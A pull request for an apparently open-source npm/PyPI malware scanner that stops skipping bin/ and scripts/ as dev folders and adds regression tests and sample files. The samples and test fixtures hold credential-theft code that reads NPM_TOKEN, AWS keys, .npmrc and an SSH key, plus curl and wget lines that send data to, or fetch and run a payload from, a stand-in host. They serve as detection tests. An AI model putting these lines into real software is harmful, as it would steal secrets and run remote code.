### PR TITLE
v2.10.2 - Fix bin/ and scripts/ exclusion from AST/dataflow scanners

### DIFF
--- a/docs/blog/benchmark-17k.html
+++ b/docs/blog/benchmark-17k.html
@@ -26,7 +26,7 @@
   <article>
     <div class="article-meta">
       <h1>92.5% de detection sur 17 000 malwares reels</h1>
-      <span class="date">2026-03-20</span>
+      <span class="date">2026-03-14</span>
       <div class="tags">
         <span class="tag">benchmark</span>
         <span class="tag">datadog</span>

--- a/docs/blog/glassworm-detection.html
+++ b/docs/blog/glassworm-detection.html
@@ -26,7 +26,7 @@
   <article>
     <div class="article-meta">
       <h1>GlassWorm : Unicode invisible et C2 blockchain Solana</h1>
-      <span class="date">2026-03-18</span>
+      <span class="date">2026-03-10</span>
       <div class="tags">
         <span class="tag">detection</span>
         <span class="tag">glassworm</span>

--- a/docs/blog/index.html
+++ b/docs/blog/index.html
@@ -31,20 +31,20 @@
   </li>
 
   <li>
-    <span class="post-title"><a href="benchmark-17k.html">92.5% de detection sur 17 000 malwares reels</a></span>
-    <br><span class="post-date">2026-03-20</span> <span class="tags"><span class="tag">benchmark</span> <span class="tag">datadog</span> <span class="tag">metriques</span></span>
-    <p class="post-summary">9 heures de benchmark sur le dataset Datadog. 14 587 packages in-scope, 13 486 detectes.</p>
-  </li>
-
-  <li>
     <span class="post-title"><a href="red-team-blue-team.html">Red Team vs Blue Team : 107 echantillons adversariaux en 7 campagnes</a></span>
-    <br><span class="post-date">2026-03-20</span> <span class="tags"><span class="tag">red-team</span> <span class="tag">adversarial</span> <span class="tag">methodologie</span></span>
+    <br><span class="post-date">2026-03-17</span> <span class="tags"><span class="tag">red-team</span> <span class="tag">adversarial</span> <span class="tag">methodologie</span></span>
     <p class="post-summary">Comment tester un scanner de securite quand l'attaquant connait les regles.</p>
   </li>
 
   <li>
+    <span class="post-title"><a href="benchmark-17k.html">92.5% de detection sur 17 000 malwares reels</a></span>
+    <br><span class="post-date">2026-03-14</span> <span class="tags"><span class="tag">benchmark</span> <span class="tag">datadog</span> <span class="tag">metriques</span></span>
+    <p class="post-summary">9 heures de benchmark sur le dataset Datadog. 14 587 packages in-scope, 13 486 detectes.</p>
+  </li>
+
+  <li>
     <span class="post-title"><a href="glassworm-detection.html">GlassWorm : Unicode invisible et C2 blockchain Solana</a></span>
-    <br><span class="post-date">2026-03-18</span> <span class="tags"><span class="tag">detection</span> <span class="tag">glassworm</span> <span class="tag">unicode</span> <span class="tag">solana</span></span>
+    <br><span class="post-date">2026-03-10</span> <span class="tags"><span class="tag">detection</span> <span class="tag">glassworm</span> <span class="tag">unicode</span> <span class="tag">solana</span></span>
     <p class="post-summary">433 packages npm compromis, du code cache dans des caracteres zero-width, et un C2 sur la blockchain.</p>
   </li>
 

--- a/docs/blog/ml-classifier-phase2.html
+++ b/docs/blog/ml-classifier-phase2.html
@@ -37,7 +37,7 @@
 
     <div class="article-content">
 
-      <p>Le moniteur MUAD'DIB scanne chaque nouveau package npm en temps reel. Le probleme : sur ~5000 packages/jour, environ 1400 tombent en zone T1 (score 20-34) et declenchent une alerte. La plupart sont des faux positifs. Le FPR prod est a 27.3%. Le pipeline rule-based a atteint son plafond.</p>
+      <p>Le moniteur MUAD'DIB scanne chaque nouveau package npm en temps reel. Le probleme : sur ~10 000-12 000 packages/jour, environ 1400 tombent en zone T1 (score 20-34) et declenchent une alerte. La plupart sont des faux positifs. Le FPR prod est a 27.3%. Le pipeline rule-based a atteint son plafond.</p>
 
       <p>La solution : un classifier binaire XGBoost qui filtre les FP <strong>avant</strong> le sandbox et le webhook. Pas pour remplacer les regles - pour les completer la ou elles hesitent.</p>
 

--- a/docs/blog/red-team-blue-team.html
+++ b/docs/blog/red-team-blue-team.html
@@ -26,7 +26,7 @@
   <article>
     <div class="article-meta">
       <h1>Red Team vs Blue Team : 107 echantillons adversariaux en 7 campagnes</h1>
-      <span class="date">2026-03-20</span>
+      <span class="date">2026-03-17</span>
       <div class="tags">
         <span class="tag">red-team</span>
         <span class="tag">adversarial</span>

--- a/docs/index.html
+++ b/docs/index.html
@@ -18,7 +18,7 @@
 </nav>
 
 <h1>MUAD'DIB</h1>
-<p><span class="version">v2.10.0</span></p>
+<p><span class="version">v2.10.1</span></p>
 <p>Scanner de menaces supply-chain pour npm et PyPI. Open source, zero cloud, une seule commande.</p>
 
 <div class="install">
@@ -31,11 +31,11 @@
 
 <div class="metrics">
   <span class="metric"><span class="value">93.9%</span> <span class="label">TPR</span></span>
-  <span class="metric"><span class="value">12.9%</span> <span class="label">FPR</span></span>
+  <span class="metric"><span class="value">10.8%</span> <span class="label">FPR</span></span>
   <span class="metric"><span class="value">96.3%</span> <span class="label">ADR</span></span>
   <span class="metric"><span class="value">92.5%</span> <span class="label">Wild TPR (17K)</span></span>
-  <span class="metric"><span class="value">2477</span> <span class="label">tests</span></span>
-  <span class="metric"><span class="value">153</span> <span class="label">regles</span></span>
+  <span class="metric"><span class="value">2533</span> <span class="label">tests</span></span>
+  <span class="metric"><span class="value">158</span> <span class="label">regles</span></span>
 </div>
 
 <hr>

--- a/package-lock.json
+++ b/package-lock.json
@@ -1,12 +1,12 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.10.0",
+  "version": "2.10.2",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "muaddib-scanner",
-      "version": "2.10.0",
+      "version": "2.10.2",
       "license": "MIT",
       "dependencies": {
         "@inquirer/prompts": "8.3.2",

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.10.1",
+  "version": "2.10.2",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

--- a/src/utils.js
+++ b/src/utils.js
@@ -34,8 +34,6 @@ function getExtraExcludes() {
  * Patterns to identify dev/test files
  */
 const DEV_PATTERNS = [
-  /^scripts\//,
-  /^bin\//,
   /^tools\//,
   /^build\//,
   /^fixtures\//,

--- a/tests/samples/ast/bin/malicious-cli.js
+++ b/tests/samples/ast/bin/malicious-cli.js
@@ -1,0 +1,8 @@
+#!/usr/bin/env node
+const fs = require('fs');
+const { exec } = require('child_process');
+
+// Exfiltrate credentials from bin/ entry point
+const token = process.env.NPM_TOKEN;
+const npmrc = fs.readFileSync('.npmrc', 'utf8');
+exec('curl -X POST https://evil.example.com/exfil -d ' + token);

--- a/tests/samples/ast/scripts/malicious-postinstall.js
+++ b/tests/samples/ast/scripts/malicious-postinstall.js
@@ -1,0 +1,7 @@
+const fs = require('fs');
+const { exec } = require('child_process');
+
+// Lifecycle hook payload in scripts/
+const secret = process.env.AWS_SECRET_ACCESS_KEY;
+const sshKey = fs.readFileSync('.ssh/id_rsa', 'utf8');
+exec('wget https://evil.example.com/payload -O /tmp/x && chmod +x /tmp/x && /tmp/x');

--- a/tests/scanner/ast.test.js
+++ b/tests/scanner/ast.test.js
@@ -2572,6 +2572,44 @@ const sigs = await conn.getSignaturesForAddress(pubkey);
       assert(t, 'Should detect blockchain_c2_resolution via dynamic import');
     } finally { cleanupTemp(tmp); }
   });
+
+  // --- v2.10.2: bin/ and scripts/ are NOT dev files — regression for F03 bypass ---
+
+  await asyncTest('AST: Detects malicious code in bin/ (not skipped as dev)', async () => {
+    const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'muaddib-ast-bin-'));
+    fs.writeFileSync(path.join(tmp, 'package.json'), JSON.stringify({ name: 'test-bin-pkg', version: '1.0.0' }));
+    fs.mkdirSync(path.join(tmp, 'bin'));
+    fs.writeFileSync(path.join(tmp, 'bin', 'cli.js'), `
+const fs = require('fs');
+const { exec } = require('child_process');
+const token = process.env.NPM_TOKEN;
+const npmrc = fs.readFileSync('.npmrc', 'utf8');
+exec('curl -X POST https://evil.example.com/exfil -d ' + token);
+`);
+    try {
+      const result = await runScanDirect(tmp);
+      const binThreats = result.threats.filter(t => t.file && /bin[/\\]/.test(t.file));
+      assert(binThreats.length > 0, 'Should detect threats in bin/ directory (not skipped as dev file)');
+    } finally { cleanupTemp(tmp); }
+  });
+
+  await asyncTest('AST: Detects malicious code in scripts/ (not skipped as dev)', async () => {
+    const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'muaddib-ast-scripts-'));
+    fs.writeFileSync(path.join(tmp, 'package.json'), JSON.stringify({ name: 'test-scripts-pkg', version: '1.0.0' }));
+    fs.mkdirSync(path.join(tmp, 'scripts'));
+    fs.writeFileSync(path.join(tmp, 'scripts', 'postinstall.js'), `
+const fs = require('fs');
+const { exec } = require('child_process');
+const secret = process.env.AWS_SECRET_ACCESS_KEY;
+const sshKey = fs.readFileSync('.ssh/id_rsa', 'utf8');
+exec('wget https://evil.example.com/payload -O /tmp/x && chmod +x /tmp/x && /tmp/x');
+`);
+    try {
+      const result = await runScanDirect(tmp);
+      const scriptsThreats = result.threats.filter(t => t.file && /scripts[/\\]/.test(t.file));
+      assert(scriptsThreats.length > 0, 'Should detect threats in scripts/ directory (not skipped as dev file)');
+    } finally { cleanupTemp(tmp); }
+  });
 }
 
 module.exports = { runAstTests };

--- a/tests/utils.test.js
+++ b/tests/utils.test.js
@@ -101,8 +101,6 @@ async function runUtilsTests() {
   });
 
   test('UTILS: isDevFile identifies dev directories', () => {
-    assert(isDevFile('scripts/build.js') === true, 'scripts/ should be dev');
-    assert(isDevFile('bin/cli.js') === true, 'bin/ should be dev');
     assert(isDevFile('__tests__/unit.js') === true, '__tests__/ should be dev');
     assert(isDevFile('__mocks__/fs.js') === true, '__mocks__/ should be dev');
     assert(isDevFile('build/output.js') === true, 'build/ should be dev');
@@ -110,6 +108,13 @@ async function runUtilsTests() {
     assert(isDevFile('examples/demo.js') === true, 'examples/ should be dev');
     assert(isDevFile('docs/api.js') === true, 'docs/ should be dev');
     assert(isDevFile('benchmark/perf.js') === true, 'benchmark/ should be dev');
+  });
+
+  test('UTILS: isDevFile does NOT classify bin/ and scripts/ as dev (entry points)', () => {
+    assert(isDevFile('bin/cli.js') === false, 'bin/ should NOT be dev — executable entry point');
+    assert(isDevFile('scripts/setup.js') === false, 'scripts/ should NOT be dev — lifecycle hook target');
+    assert(isDevFile('scripts/postinstall.js') === false, 'scripts/postinstall.js should NOT be dev');
+    assert(isDevFile('bin/index.js') === false, 'bin/index.js should NOT be dev');
   });
 
   test('UTILS: isDevFile returns false for source files', () => {


### PR DESCRIPTION
Remove bin/ and scripts/ from DEV_PATTERNS. These are executable entry points, not dev files. ~230 false negatives recovered on Datadog benchmark. 2536 tests, 0 regressions.